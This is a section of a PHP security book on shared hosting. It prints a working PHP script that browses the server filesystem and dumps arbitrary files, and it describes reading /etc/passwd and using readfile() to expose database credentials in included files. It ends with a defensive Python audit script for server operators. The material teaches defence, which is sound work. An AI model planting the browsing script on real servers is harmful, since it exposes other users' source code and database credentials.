8.4. Filesystem Browsing

In addition to being able to read arbitrary files on a shared host, an attacker can also create a script that browses the filesystem. This type of script can be used to discover the location of your source code because your most sensitive files are not likely to be stored within document root. An example of such a script follows:

    <?php

    // Dispatch on the query string: list a directory, dump a file,
    // or start at the filesystem root when neither is given.
    if (isset($_GET['dir']))
    {
      ls($_GET['dir']);
    }
    elseif (isset($_GET['file']))
    {
      cat($_GET['file']);
    }
    else
    {
      ls('/');
    }

    // Dump a file's contents, escaped so it renders as text in the browser.
    function cat($file)
    {
      echo htmlentities(file_get_contents($file), ENT_QUOTES, 'UTF-8');
    }

    // List a directory; readable entries become links back to this script.
    function ls($dir)
    {
      $handle = dir($dir);

      while ($filename = $handle->read())
      {
        $size = filesize("$dir$filename");

        if (is_dir("$dir$filename"))
        {
          $type = 'dir';
          $filename .= '/';
        }
        else
        {
          $type = 'file';
        }

        if (is_readable("$dir$filename"))
        {
          $line = str_pad($size, 15);
          $line .= "<a href=\"{$_SERVER['PHP_SELF']}";
          $line .= "?$type=$dir$filename\">$filename</a>";
        }
        else
        {
          $line = str_pad($size, 15);
          $line .= $filename;
        }

        echo "$line\n";
      }

      $handle->close();
    }

    ?>

An attacker might first view /etc/passwd or a directory listing of /home to get a list of usernames on the server. It is then trivial to browse a user's source code within the user's document root; the location of source code stored outside of the user's document root is revealed by language constructs such as include and require. For example, consider discovering the following script at /home/victim/public_html/admin.php:

    <?php

    include '../inc/db.inc';

    /* ... */

    ?>

If an attacker manages to view the source of this file, the exact location of db.inc is discovered, and the attacker can use readfile() to expose the contents, revealing the database access credentials. Thus, the fact that db.inc is stored outside of document root offers subpar protection in this environment.

This particular attack illustrates why you should consider all source code on a shared server to be public, opting to store all sensitive data in a database.
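Added example, not from the book or its author: a host-side audit in Python that the operator of such a shared server could run to list the files each user keeps outside the document root that the web-server identity can nevertheless read, which is exactly the set the browsing script above would reach. It assumes the /home/<user>/public_html layout of the example and takes the web server's uid/gid as parameters; the directory tree it builds for the demonstration is constructed.

```python
import os, stat, tempfile

DOCROOT = "public_html"  # assumed name of each user's document root

def readable_by(st, uid, gid, groups=()):
    # Read permission for (uid, gid) from mode bits alone, so the verdict concerns
    # the web-server identity rather than whoever runs the audit.
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IRUSR)
    if st.st_gid == gid or st.st_gid in groups:
        return bool(st.st_mode & stat.S_IRGRP)
    return bool(st.st_mode & stat.S_IROTH)

def audit_home(root, web_uid, web_gid, groups=()):
    # (user, path relative to home) for every regular file outside the user's
    # document root that the web-server identity could still read.
    findings = []
    for user in sorted(os.listdir(root)):
        home = os.path.join(root, user)
        if not os.path.isdir(home):
            continue
        for dirpath, dirs, files in os.walk(home):
            if dirpath == home:
                dirs[:] = [d for d in dirs if d != DOCROOT]  # docroot is public by design
            for name in files:
                path = os.path.join(dirpath, name)
                st = os.lstat(path)
                if stat.S_ISREG(st.st_mode) and readable_by(st, web_uid, web_gid, groups):
                    findings.append((user, os.path.relpath(path, home)))
    return sorted(findings)

def build_demo(root):
    # Constructed layout mirroring the page: admin.php inside the document root,
    # db.inc one level above it (mode 0644), and a 0600 file for contrast.
    samples = {(DOCROOT, "admin.php"): 0o644, ("inc", "db.inc"): 0o644,
               ("inc", "private.key"): 0o600}
    for parts, mode in samples.items():
        path = os.path.join(root, "victim", *parts)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php /* constructed sample */ ?>\n")
        os.chmod(path, mode)

def run_demo(as_owner=False):
    # Audit the demo tree as a foreign web-server identity (default) or as the owner.
    shift = 0 if as_owner else 1
    with tempfile.TemporaryDirectory() as tmp:
        build_demo(tmp)
        return audit_home(tmp, os.getuid() + shift, os.getgid() + shift)
```

The check looks only at each file's own mode bits, not at the search (x) bits of its parent directories, so it can over-report files whose directory already blocks the web-server user; run it as root so every home directory can be walked.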
